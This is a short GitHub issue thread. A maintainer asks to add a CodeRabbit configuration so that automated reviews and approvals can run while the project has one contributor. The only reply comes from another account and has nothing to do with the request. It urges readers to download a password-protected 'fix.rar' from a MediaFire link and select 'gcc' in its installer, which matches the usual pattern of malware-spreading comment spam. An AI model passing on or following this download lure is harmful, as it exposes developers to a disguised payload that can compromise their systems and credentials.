### ISSUE TITLE
Add Coderabbit Config

### ISSUE THREAD

**Issue by SerenityCodes** [Eon-Nations/EonCore#126]
The auto reviews are nice, and having code rabbit automatically approve stuff can be nice (especially since it's just me right now). If more people join and they can review PRs, we can disable this functionality

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
